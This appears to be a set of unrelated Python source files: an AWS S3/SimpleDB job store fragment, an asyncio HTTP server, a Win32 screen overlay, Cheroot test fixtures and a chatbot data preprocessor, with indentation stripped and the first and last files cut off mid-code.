if not cls.bucketNameRe.match(namePrefix):
raise ValueError("Invalid name prefix '%s'. Name prefixes must contain only digits, "
"hyphens or lower-case letters and must not start or end in a "
"hyphen." % namePrefix)
# reserve 13 for separator and suffix
if len(namePrefix) > 50:
raise ValueError("Invalid name prefix '%s'. Name prefixes may not be longer than 50 "
"characters." % namePrefix)
if '--' in namePrefix:
raise ValueError("Invalid name prefix '%s'. Name prefixes may not contain "
"%s." % (namePrefix, cls.nameSeparator))
return region, namePrefix
def _connectSimpleDB(self):
"""
rtype: SDBConnection
"""
db = boto.sdb.connect_to_region(self.region)
if db is None:
raise ValueError("Could not connect to SimpleDB. Make sure '%s' is a valid SimpleDB "
"region." % self.region)
assert db is not None
return db
def _connectS3(self):
"""
:rtype: S3Connection
"""
s3 = boto.s3.connect_to_region(self.region)
if s3 is None:
raise ValueError("Could not connect to S3. Make sure '%s' is a valid S3 region." %
self.region)
return s3
def _getOrCreateBucket(self, bucket_name, versioning=False):
"""
:rtype Bucket
"""
assert self.bucketNameRe.match(bucket_name)
assert 3 <= len(bucket_name) <= 63
try:
bucket = self.s3.get_bucket(bucket_name, validate=True)
assert versioning is self.__getBucketVersioning(bucket)
return bucket
except S3ResponseError as e:
if e.error_code == 'NoSuchBucket':
bucket = self.s3.create_bucket(bucket_name, location=self.region)
if versioning:
bucket.configure_versioning(versioning)
return bucket
else:
raise
def _getOrCreateDomain(self, domain_name):
"""
Return the boto Domain object representing the SDB domain with the given name. If the
domain does not exist it will be created.
:param domain_name: the unqualified name of the domain to be created
:rtype : Domain
"""
try:
return self.db.get_domain(domain_name)
except SDBResponseError as e:
if no_such_domain(e):
for attempt in retry_sdb(retry_while=sdb_unavailable):
with attempt:
return self.db.create_domain(domain_name)
else:
raise
def _newJobID(self):
return str(uuid.uuid4())
# A dummy job ID under which all shared files are stored.
sharedFileJobID = uuid.UUID('891f7db6-e4d9-4221-a58e-ab6cc4395f94')
def _newFileID(self, sharedFileName=None):
if sharedFileName is None:
return str(uuid.uuid4())
else:
return str(uuid.uuid5(self.sharedFileJobID, str(sharedFileName)))
def _getFileVersionAndBucket(self, jobStoreFileID):
"""
:rtype: tuple(str version, AWS bucket)
"""
item = None
for attempt in retry_sdb():
with attempt:
item = self.versions.get_attributes(item_name=jobStoreFileID,
attribute_name=['version', 'bucketName'],
consistent_read=True)
assert item is not None
bucketName = item.get('bucketName')
if bucketName is None:
return None, None
else:
# noinspection PyTypeChecker
return item.get('version'), getattr(self, bucketName)
def _getFileVersion(self, jobStoreFileID, expectedBucket=None):
version, bucket = self._getFileVersionAndBucket(jobStoreFileID)
if bucket is None:
assert version is None
else:
if expectedBucket is None:
expectedBucket = self.files
assert bucket is expectedBucket
return version
_s3_part_size = 50 * 1024 * 1024
def _upload(self, jobStoreFileID, localFilePath):
file_size, file_time = self._fileSizeAndTime(localFilePath)
headers = {}
self.__add_encryption_headers(headers)
if file_size <= self._s3_part_size:
key = self.files.new_key(key_name=jobStoreFileID)
key.name = jobStoreFileID
key.set_contents_from_filename(localFilePath, headers=headers)
version = key.version_id
else:
with open(localFilePath, 'rb') as f:
upload = self.files.initiate_multipart_upload(key_name=jobStoreFileID,
headers=headers)
try:
start = 0
part_num = itertools.count()
while start < file_size:
end = min(start + self._s3_part_size, file_size)
assert f.tell() == start
upload.upload_part_from_file(fp=f,
part_num=next(part_num) + 1,
size=end - start,
headers=headers)
start = end
assert f.tell() == file_size == start
except:
upload.cancel_upload()
raise
else:
version = upload.complete_upload().version_id
key = self.files.get_key(jobStoreFileID, headers=headers)
assert key.size == file_size
# Make resonably sure that the file wasn't touched during the upload
assert self._fileSizeAndTime(localFilePath) == (file_size, file_time)
return version
@contextmanager
def _uploadStream(self, jobStoreFileID, bucket, multipart=True, encrypted=True):
key = bucket.new_key(key_name=jobStoreFileID)
assert key.version_id is None
readable_fh, writable_fh = os.pipe()
headers = {}
if encrypted:
self.__add_encryption_headers(headers)
with os.fdopen(readable_fh, 'r') as readable:
with os.fdopen(writable_fh, 'w') as writable:
def reader():
try:
upload = bucket.initiate_multipart_upload(key_name=jobStoreFileID,
headers=headers)
try:
for part_num in itertools.count():
# FIXME: Consider using a key.set_contents_from_stream and rip ...
# FIXME: ... the query_args logic from upload_part_from_file in ...
# FIXME: ... in MultipartUpload. Possible downside is that ...
# FIXME: ... implicit retries won't work.
buf = readable.read(self._s3_part_size)
# There must be at least one part, even if the file is empty.
if len(buf) == 0 and part_num > 0: break
upload.upload_part_from_file(fp=StringIO(buf),
# S3 part numbers are 1-based
part_num=part_num + 1, headers=headers)
if len(buf) == 0: break
except:
upload.cancel_upload()
raise
else:
key.version_id = upload.complete_upload().version_id
except:
log.exception('Exception in reader thread')
def simpleReader():
log.debug("Using single part upload")
try:
buf = StringIO(readable.read())
assert key.set_contents_from_file(fp=buf, headers=headers) == buf.len
except:
log.exception("Exception in simple reader thread")
thread = Thread(target=reader if multipart else simpleReader)
thread.start()
# Yield the key now with version_id unset. When reader() returns
# key.version_id will be set.
yield writable, key
# The writable is now closed. This will send EOF to the readable and cause that
# thread to finish.
thread.join()
assert key.version_id is not None
def _download(self, jobStoreFileID, localFilePath, version):
headers = {}
self.__add_encryption_headers(headers)
key = self.files.get_key(jobStoreFileID, headers=headers)
key.get_contents_to_filename(localFilePath, version_id=version, headers=headers)
@contextmanager
def _downloadStream(self, jobStoreFileID, version, bucket, encrypted=True):
headers = {}
if encrypted:
self.__add_encryption_headers(headers)
key = bucket.get_key(jobStoreFileID, headers=headers)
readable_fh, writable_fh = os.pipe()
with os.fdopen(readable_fh, 'r') as readable:
with os.fdopen(writable_fh, 'w') as writable:
def writer():
key.get_contents_to_file(writable, headers=headers, version_id=version)
# This close() will send EOF to the reading end and ultimately cause the
# yield to return. It also makes the implict .close() done by the enclosing
# "with" context redundant but that should be ok since .close() on file
# objects are idempotent.
writable.close()
thread = Thread(target=writer)
thread.start()
yield readable
thread.join()
def _registerFile(self, jobStoreFileID,
bucketName='files', jobStoreID=None, newVersion=None, oldVersion=None):
"""
Register a a file in the store
:param jobStoreFileID: the file's ID, mandatory
:param bucketName: the name of the S3 bucket the file was placed in
:param jobStoreID: optional ID of the job owning the file, only allowed for first version of
file
:param newVersion: the file's new version or None if the file is to be registered without
content, in which case jobStoreId must be passed
:param oldVersion: the expected previous version of the file or None if newVersion is the
first version or file is registered without content
"""
# Must pass newVersion if passing oldVersion
assert oldVersion is None or newVersion is not None
attributes = dict(bucketName=bucketName)
if newVersion is not None:
attributes['version'] = newVersion
if jobStoreID is not None:
attributes['jobStoreID'] = jobStoreID
# False stands for absence
expected = ['version', False if oldVersion is None else oldVersion]
try:
for attempt in retry_sdb():
with attempt:
assert self.versions.put_attributes(item_name=jobStoreFileID,
attributes=attributes,
expected_value=expected)
if oldVersion is not None:
bucket = getattr(self, bucketName)
bucket.delete_key(jobStoreFileID, version_id=oldVersion)
except SDBResponseError as e:
if e.error_code == 'ConditionalCheckFailed':
raise ConcurrentFileModificationException(jobStoreFileID)
else:
raise
def _fileSizeAndTime(self, localFilePath):
file_stat = os.stat(localFilePath)
file_size, file_time = file_stat.st_size, file_stat.st_mtime
return file_size, file_time
versionings = dict(Enabled=True, Disabled=False, Suspended=None)
def __getBucketVersioning(self, bucket):
"""
A valueable lesson in how to feck up a simple tri-state boolean.
For newly created buckets get_versioning_status returns None. We map that to False.
TBD: This may actually be a result of eventual consistency
Otherwise, the 'Versioning' entry in the dictionary returned by get_versioning_status can
be 'Enabled', 'Suspended' or 'Disabled' which we map to True, None and False
respectively. Calling configure_versioning with False on a bucket will cause
get_versioning_status to then return 'Suspended' for some reason.
"""
status = bucket.get_versioning_status()
return bool(status) and self.versionings[status['Versioning']]
def __add_encryption_headers(self, headers):
if self.sseKey is not None:
self._add_encryption_headers(self.sseKey, headers)
def deleteJobStore(self):
self.registry_domain.put_attributes(self.namePrefix, dict(exists=str(False)))
for bucket in (self.files, self.stats):
if bucket is not None:
for upload in bucket.list_multipart_uploads():
upload.cancel_upload()
if self.__getBucketVersioning(bucket) in (True, None):
for key in list(bucket.list_versions()):
bucket.delete_key(key.name, version_id=key.version_id)
else:
for key in list(bucket.list()):
key.delete()
bucket.delete()
for domain in (self.versions, self.jobDomain):
if domain is not None:
domain.delete()
@staticmethod
def _add_encryption_headers(sse_key, headers):
assert len(sse_key) == 32
encoded_sse_key = base64.b64encode(sse_key)
encoded_sse_key_md5 = base64.b64encode(hashlib.md5(sse_key).digest())
headers['x-amz-server-side-encryption-customer-algorithm'] = 'AES256'
headers['x-amz-server-side-encryption-customer-key'] = encoded_sse_key
headers['x-amz-server-side-encryption-customer-key-md5'] = encoded_sse_key_md5
class AWSJob(JobWrapper):
"""
A Job that can be converted to and from a SimpleDB Item
"""
@classmethod
def fromItem(cls, item):
"""
:type item: Item
:rtype: AWSJob
"""
chunkedJob = item.items()
chunkedJob.sort()
if len(chunkedJob) == 1:
# First element of list = tuple, second element of tuple = serialized job
wholeJobString = chunkedJob[0][1]
else:
wholeJobString = ''.join(item[1] for item in chunkedJob)
return cPickle.loads(bz2.decompress(base64.b64decode(wholeJobString)))
def toItem(self):
"""
:rtype: Item
"""
item = {}
serializedAndEncodedJob = base64.b64encode(bz2.compress(cPickle.dumps(self)))
# this convoluted expression splits the string into chunks of 1024 - the max value for an attribute in SDB
jobChunks = [serializedAndEncodedJob[i:i + 1024]
for i in range(0, len(serializedAndEncodedJob), 1024)]
for attributeOrder, chunk in enumerate(jobChunks):
item[str(attributeOrder).zfill(3)] = chunk
return item
# FIXME: This was lifted from cgcloud-lib where we use it for EC2 retries. The only difference
# FIXME: ... between that code and this is the name of the exception.
a_short_time = 5
a_long_time = 60 * 60
def no_such_domain(e):
return isinstance(e, SDBResponseError) and e.error_code.endswith('NoSuchDomain')
def sdb_unavailable(e):
return e.__class__ == BotoServerError and e.status.startswith("503")
def true(_):
return True
def false(_):
return False
def retry_sdb(retry_after=a_short_time,
retry_for=10 * a_short_time,
retry_while=no_such_domain):
"""
Retry an SDB operation while the failure matches a given predicate and until a given timeout
expires, waiting a given amount of time in between attempts. This function is a generator
that yields contextmanagers. See doctests below for example usage.
:param retry_after: the delay in seconds between attempts
:param retry_for: the timeout in seconds.
:param retry_while: a callable with one argument, an instance of SDBResponseError, returning
True if another attempt should be made or False otherwise
:return: a generator yielding contextmanagers
Retry for a limited amount of time:
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=true ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i > 1
True
Do exactly one attempt:
>>> i = 0
>>> for attempt in retry_sdb( retry_for=0 ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i
1
Don't retry on success
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=true ):
... with attempt:
... i += 1
>>> i
1
Don't retry on unless condition returns
>>> i = 0
>>> for attempt in retry_sdb( retry_after=0, retry_for=.1, retry_while=false ):
... with attempt:
... i += 1
... raise SDBResponseError( 'foo', 'bar' )
Traceback (most recent call last):
...
SDBResponseError: SDBResponseError: foo bar
<BLANKLINE>
>>> i
1
"""
if retry_for > 0:
go = [None]
@contextmanager
def repeated_attempt():
try:
yield
except BotoServerError as e:
if time.time() + retry_after < expiration:
if retry_while(e):
log.info('... got %s, trying again in %is ...', e.error_code, retry_after)
time.sleep(retry_after)
else:
log.info('Exception failed predicate, giving up.')
raise
else:
log.info('Retry timeout expired, giving up.')
raise
else:
go.pop()
expiration = time.time() + retry_for
while go:
yield repeated_attempt()
else:
@contextmanager
def single_attempt():
yield
yield single_attempt()
def parse_bool(s):
if s == 'True':
return True
elif s == 'False':
return False
else:
raise ValueError(s)
|
server.py
|
# -*- coding: utf-8 -*-
import asyncio
import multiprocessing
import os
from functools import partial
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from xTool.log.log import logger
from xTool.utils.processes import ctrlc_workaround_for_windows
from xTool.misc import OS_IS_WINDOWS
from xTool.aiomisc import load_uvlopo
from xTool.servers.protocols.http_protocol import HttpProtocol
from xTool.servers.trigger import trigger_events
from xTool.servers.signal import Signal
load_uvlopo()
class AsyncioServer:
"""
Wraps an asyncio server with functionality that might be useful to
a user who needs to manage the server lifecycle manually.
"""
__slots__ = (
"loop",
"serve_coro",
"_after_start",
"_before_stop",
"_after_stop",
"server",
"connections",
)
def __init__(
self,
loop,
serve_coro,
connections,
after_start,
before_stop,
after_stop,
):
# Note, Sanic already called "before_server_start" events
# before this helper was even created. So we don't need it here.
self.loop = loop
self.serve_coro = serve_coro
self._after_start = after_start
self._before_stop = before_stop
self._after_stop = after_stop
self.server = None
self.connections = connections
def after_start(self):
"""Trigger "after_server_start" events"""
trigger_events(self._after_start, self.loop)
def before_stop(self):
"""Trigger "before_server_stop" events"""
trigger_events(self._before_stop, self.loop)
def after_stop(self):
"""Trigger "after_server_stop" events"""
trigger_events(self._after_stop, self.loop)
def is_serving(self):
"""判断服务器是否已经启动 ."""
if self.server:
return self.server.is_serving()
return False
def wait_closed(self):
if self.server:
return self.server.wait_closed()
def close(self):
"""关闭服务器 ."""
if self.server:
# 关闭服务器
self.server.close()
# 创建一个等待服务器关闭任务
coro = self.wait_closed()
task = asyncio.ensure_future(coro, loop=self.loop)
return task
def start_serving(self):
"""启动服务器 ."""
if self.server:
try:
return self.server.start_serving()
except AttributeError:
raise NotImplementedError(
"server.start_serving not available in this version "
"of asyncio or uvloop."
)
def serve_forever(self):
if self.server:
try:
return self.server.serve_forever()
except AttributeError:
raise NotImplementedError(
"server.serve_forever not available in this version "
"of asyncio or uvloop."
)
def __await__(self):
"""Starts the asyncio server, returns AsyncServerCoro"""
task = asyncio.ensure_future(self.serve_coro)
# 等待task执行完成
while not task.done():
yield
# 获得task的执行结果
self.server = task.result()
# 返回AsyncioServer
return self
def serve(
host,
port,
app,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
ssl=None,
sock=None,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
state=None,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param run_async: bool: Do not create a new event loop for the server,
and return an AsyncServer object rather than running it
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if app.debug:
loop.set_debug(app.debug)
app.asgi = False
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
app=app,
state=state,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
# 创建一个http server coroutine
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs,
)
if run_async:
return AsyncioServer(
loop=loop,
serve_coro=server_coroutine,
connections=connections,
after_start=after_start,
before_stop=before_stop,
after_stop=after_stop,
)
trigger_events(before_start, loop)
# 创建http server future
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
# 服务启动后的初始化
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# 注册信号处理函数
# Register signals for graceful termination
if register_sys_signals:
if OS_IS_WINDOWS:
# 注册SIGINT
ctrlc_workaround_for_windows(app)
else:
for _signal in [SIGTERM] if run_multiple else [SIGINT, SIGTERM]:
loop.add_signal_handler(_signal, app.stop)
# 获得主进程ID
pid = os.getpid()
# 运行http server
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
graceful = app.config.GRACEFUL_SHUTDOWN_TIMEOUT
start_shutdown = 0
while connections and (start_shutdown < graceful):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
_shutdown = asyncio.gather(*coros)
loop.run_until_complete(_shutdown)
else:
conn.close()
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
processes = []
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
mp = multiprocessing.get_context("fork")
# 启动多个子进程
for _ in range(workers):
process = mp.Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
# 等待所有子进程结束
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
screencanvas.py
|
import win32api, win32con, win32gui, win32ui
import ctypes
from typing import List
import threading
import time
import string
import uuid
import ctypes
import queue
from . import rectangle, win32_contants
def draw_loop(_queue: queue.Queue):
while True:
try:
canvas = _queue.get(block=True, timeout=0.02)
except queue.Empty:
pass
else:
canvas.initial_draw()
finally:
win32gui.PumpWaitingMessages()
draw_queue = queue.Queue()
draw_thread = threading.Thread(target=draw_loop, args=(draw_queue,), daemon=True)
draw_thread.start()
class ScreenCanvas:
def __init__(
self,
x = 0,
y = 0,
width = ctypes.windll.user32.GetSystemMetrics(win32_contants.SM_CXSCREEN),
height = ctypes.windll.user32.GetSystemMetrics(win32_contants.SM_CYSCREEN),
font_color = (0, 0, 0)
):
self.window_handle = None
self.x = x
self.y = y
self.width = width
self.height = height
self.font_color = font_color
self.rectangles: List[rectangle.Rectangle] = []
self._wndClassAtom, self._hInstance = self._win32_setup()
self.window_rendered = threading.Event()
self.render_lock = threading.Lock()
def add_rectangle(self, x: int, y: int, width: int, height: int, text=None):
rect = rectangle.Rectangle(x, y, width, height, text=text)
self.rectangles.append(rect)
def reset(self):
self.rectangles = []
def render(self):
with self.render_lock:
if self.window_handle is None:
self.window_handle = 'placeholder'
draw_queue.put(self)
else:
self.window_rendered.wait()
win32gui.RedrawWindow(self.window_handle, None, None, win32_contants.RDW_INVALIDATE | win32_contants.RDW_ERASE)
def initial_draw(self):
self.window_handle = win32gui.CreateWindowEx(
win32_contants.EX_STYLE,
self._wndClassAtom,
None, # WindowName
win32_contants.STYLE,
self.x,
self.y,
self.width,
self.height,
None, # hWndParent
None, # hMenu
self._hInstance,
None # lpParam
)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633540(v=vs.85).aspx
win32gui.SetLayeredWindowAttributes(self.window_handle, 0x00ffffff, 255, win32_contants.LWA_COLORKEY | win32_contants.LWA_ALPHA)
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145167(v=vs.85).aspx
#win32gui.UpdateWindow(self.window_handle)
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633545(v=vs.85).aspx
win32gui.SetWindowPos(self.window_handle, win32_contants.HWND_TOPMOST, 0, 0, 0, 0,
win32_contants.SWP_NOACTIVATE | win32_contants.SWP_NOMOVE | win32_contants.SWP_NOSIZE | win32_contants.SWP_SHOWWINDOW)
self.window_rendered.set()
def _win_message(self, hWnd, message, wParam, lParam):
if message == win32_contants.WM_PAINT:
device_context_handle, paintStruct = win32gui.BeginPaint(hWnd)
dpiScale = ctypes.windll.gdi32.GetDeviceCaps(device_context_handle, win32_contants.LOGPIXELSX) / 60.0
fontSize = 14
# http://msdn.microsoft.com/en-us/library/windows/desktop/dd145037(v=vs.85).aspx
lf = win32gui.LOGFONT()
lf.lfFaceName = "Times New Roman"
# lf.lfHeight = int(round(dpiScale * fontSize))
lf.lfHeight = 20
lf.lfWeight = 0
# Use nonantialiased to remove the white edges around the text.
lf.lfQuality = win32con.NONANTIALIASED_QUALITY
hf = win32gui.CreateFontIndirect(lf)
win32gui.SetTextColor(device_context_handle, win32_color(self.font_color))
win32gui.SelectObject(device_context_handle, hf)
self._draw(device_context_handle)
win32gui.EndPaint(hWnd, paintStruct)
return 0
elif message == win32_contants.WM_DESTROY:
win32gui.PostQuitMessage(0)
return 0
else:
return win32gui.DefWindowProc(hWnd, message, wParam, lParam)
def _draw(self, device_context_handle):
for rect in self.rectangles:
rect.draw(device_context_handle)
def _win32_setup(self):
hInstance = win32api.GetModuleHandle()
className = str(uuid.uuid4()) # probably a better way to do this
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms633576(v=vs.85).aspx
# win32gui does not support WNDCLASSEX.
wndClass = win32gui.WNDCLASS()
# http://msdn.microsoft.com/en-us/library/windows/desktop/ff729176(v=vs.85).aspx
wndClass.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wndClass.lpfnWndProc = self._win_message
wndClass.hInstance = hInstance
wndClass.hCursor = win32gui.LoadCursor(None, win32con.IDC_ARROW)
wndClass.hbrBackground = win32gui.GetStockObject(win32con.WHITE_BRUSH)
wndClass.lpszClassName = className
# win32gui does not support RegisterClassEx
wndClassAtom = win32gui.RegisterClass(wndClass)
return wndClassAtom, hInstance
def win32_color(color):
if isinstance(color, (tuple, list)):
return win32api.RGB(*color)
|
testing.py
|
"""Pytest fixtures and other helpers for doing testing by end-users."""
from contextlib import closing
import errno
import socket
import threading
import time
import pytest
from six.moves import http_client
import cheroot.server
from cheroot.test import webtest
import cheroot.wsgi
EPHEMERAL_PORT = 0
NO_INTERFACE = None # Using this or '' will cause an exception
ANY_INTERFACE_IPV4 = '0.0.0.0'
ANY_INTERFACE_IPV6 = '::'
config = {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'wsgi_app': None,
}
def cheroot_server(server_factory):
"""Set up and tear down a Cheroot server instance."""
conf = config.copy()
bind_port = conf.pop('bind_addr')[-1]
for interface in ANY_INTERFACE_IPV6, ANY_INTERFACE_IPV4:
try:
actual_bind_addr = (interface, bind_port)
httpserver = server_factory( # create it
bind_addr=actual_bind_addr,
**conf
)
except OSError:
pass
else:
break
threading.Thread(target=httpserver.safe_start).start() # spawn it
while not httpserver.ready: # wait until fully initialized and bound
time.sleep(0.1)
yield httpserver
httpserver.stop() # destroy it
@pytest.fixture(scope='module')
def wsgi_server():
"""Set up and tear down a Cheroot WSGI server instance."""
for srv in cheroot_server(cheroot.wsgi.Server):
yield srv
@pytest.fixture(scope='module')
def native_server():
"""Set up and tear down a Cheroot HTTP server instance."""
for srv in cheroot_server(cheroot.server.HTTPServer):
yield srv
class _TestClient(object):
def __init__(self, server):
self._interface, self._host, self._port = _get_conn_data(server)
self._http_connection = self.get_connection()
self.server_instance = server
def get_connection(self):
name = '{interface}:{port}'.format(
interface=self._interface,
port=self._port,
)
return http_client.HTTPConnection(name)
def request(
self, uri, method='GET', headers=None, http_conn=None,
protocol='HTTP/1.1',
):
return webtest.openURL(
uri, method=method,
headers=headers,
host=self._host, port=self._port,
http_conn=http_conn or self._http_connection,
protocol=protocol,
)
def __getattr__(self, attr_name):
def _wrapper(uri, **kwargs):
http_method = attr_name.upper()
return self.request(uri, method=http_method, **kwargs)
return _wrapper
def _probe_ipv6_sock(interface):
# Alternate way is to check IPs on interfaces using glibc, like:
# github.com/Gautier/minifail/blob/master/minifail/getifaddrs.py
try:
with closing(socket.socket(family=socket.AF_INET6)) as sock:
sock.bind((interface, 0))
except (OSError, socket.error) as sock_err:
# In Python 3 socket.error is an alias for OSError
# In Python 2 socket.error is a subclass of IOError
if sock_err.errno != errno.EADDRNOTAVAIL:
raise
else:
return True
return False
def _get_conn_data(server):
host, port = server.bind_addr
interface = webtest.interface(host)
if ':' in interface and not _probe_ipv6_sock(interface):
interface = '127.0.0.1'
if ':' in host:
host = interface
return interface, host, port
def get_server_client(server):
"""Create and return a test client for the given server."""
return _TestClient(server)
|
dataprocessor.py
|
import os
import util.tokenizer
import util.vocabutils as vocab_utils
from tensorflow.python.platform import gfile
from random import shuffle
from multiprocessing import Process, Lock
import time
from math import floor
class DataProcessor(object):
def __init__(self, max_vocab_size, source_data_path,
processed_data_path, train_frac,
num_lines=4, max_target_length=50, max_source_length=200):
self.MAX_SOURCE_TOKEN_LENGTH = max_source_length
self.MAX_TARGET_TOKEN_LENGTH = max_target_length
self.NUM_LINES = num_lines
self.tokenizer = util.tokenizer.basic_tokenizer
assert train_frac > 0.0 and train_frac <= 1.0, "Train frac not between 0 and 1..."
self.train_frac = train_frac
self.max_vocab_size = max_vocab_size
self.source_data_path = source_data_path
self.processed_data_path = processed_data_path
train_path = os.path.join(processed_data_path, "train/")
test_path = os.path.join(processed_data_path, "test/")
if not os.path.exists(train_path):
os.makedirs(train_path)
if not os.path.exists(test_path):
os.makedirs(test_path)
self.data_source_train = os.path.join(train_path,
"data_source_train.txt")
self.data_target_train = os.path.join(train_path,
"data_target_train.txt")
self.data_source_test = os.path.join(test_path,
"data_source_test.txt")
self.data_target_test = os.path.join(test_path,
"data_target_test.txt")
print "Checking to see what data processor needs to do..."
vocab_path = os.path.join(processed_data_path, "vocab.txt")
self.vocab_exists = gfile.Exists(vocab_path)
self.data_files_exist = self.vocab_exists and \
gfile.Exists(self.data_source_train) and \
gfile.Exists(self.data_target_train) and \
gfile.Exists(self.data_source_test) and \
gfile.Exists(self.data_target_test)
def run(self):
if not self.data_files_exist:
print "Obtaining raw text conversation files..."
text_files = self.getRawFileList()
# randomly shuffle order of files
shuffle(text_files)
num_train_files = int(self.train_frac * len(text_files))
#create vocab file
if not self.vocab_exists:
vocab_builder = vocab_utils.VocabBuilder(self.max_vocab_size, self.processed_data_path)
print "Building vocab..."
for text_file in text_files:
with open(text_file, "r+") as f:
vocab_builder.growVocab(f.read())
print "Creating vocab file..."
vocab_builder.createVocabFile()
if not self.data_files_exist:
self.vocab_mapper = vocab_utils.VocabMapper(self.processed_data_path)
#create source and target token id files
processes = []
print "Creating token id data source and target train files..."
if len(text_files) == 1:
num_train_files = 1
text_files = self.splitSingle2Many(text_files[0], self.train_frac)
p1 = Process(target=self.loopParseTextFiles, args=([text_files[:num_train_files]], True))
p1.start()
processes.append(p1)
print "Creating token id data source and target test files..."
print "This is going to take a while..."
p2 = Process(target=self.loopParseTextFiles, args=([text_files[num_train_files:]], False))
p2.start()
processes.append(p2)
for p in processes:
if p.is_alive():
p.join()
print "Done data pre-processing..."
def loopParseTextFiles(self, text_files, is_train):
for text_file in text_files[0]:
self.parseTextFile(text_file, is_train)
def splitSingle2Many(self, text_file, train_frac):
temp = "temp/"
if not gfile.Exists(temp):
os.mkdir(temp)
with open(text_file, 'r') as f:
sentences = f.read().split('\n')
num_train = int(floor(train_frac * len(sentences)))
if num_train %2 != 0:
num_train += 1
num_test = len(sentences) - num_train
print "num train {0}, num test {1}".format(num_train, num_test)
train_file_name = "{0}{1}train.txt".format(temp,int(time.time()))
test_file_name = "{0}{1}test.txt".format(temp,int(time.time()))
with open(train_file_name, "w+") as f2:
f2.write("\n".join(sentences[:num_train]))
with open(test_file_name, "w+") as f2:
f2.write("\n".join(sentences[num_train:]))
return [train_file_name, test_file_name]
def parseTextFile(self, text_file, is_train):
with open(text_file, "r+") as f:
line_buffer = []
for line in f:
if len(line_buffer) > self.NUM_LINES:
self.findSentencePairs(line_buffer, is_train)
line_buffer.pop(0)
line_buffer.append(line)
def getRawFileList(self):
text_files = []
for f in os.listdir(self.source_data_path):
if not f.endswith("~"):
text_files.append(os.path.join(self.source_data_path, f))
return text_files
def findSentencePairs(self, line_buffer, is_train):
assert len(line_buffer) == self.NUM_LINES+1, "Num lines: {0}, length of line buffer: {1}".format(self.NUM_LINES, len(line_buffer))
if len(line_buffer) > 0:
for i in range(1, len(line_buffer)):
source_sentences = " ".join(line_buffer[:i])
source_sentences = source_sentences.strip()
target_sentences = line_buffer[i].strip()
#Tokenize sentences
source_sentences = self.tokenizer(source_sentences)
target_sentences = self.tokenizer(target_sentences)
#Convert tokens to id string, reverse source inputs
source_sentences = list(reversed(self.vocab_mapper.tokens2Indices(source_sentences)))
target_sentences = self.vocab_mapper.tokens2Indices(target_sentences)
#remove outliers (really long sentences) from data
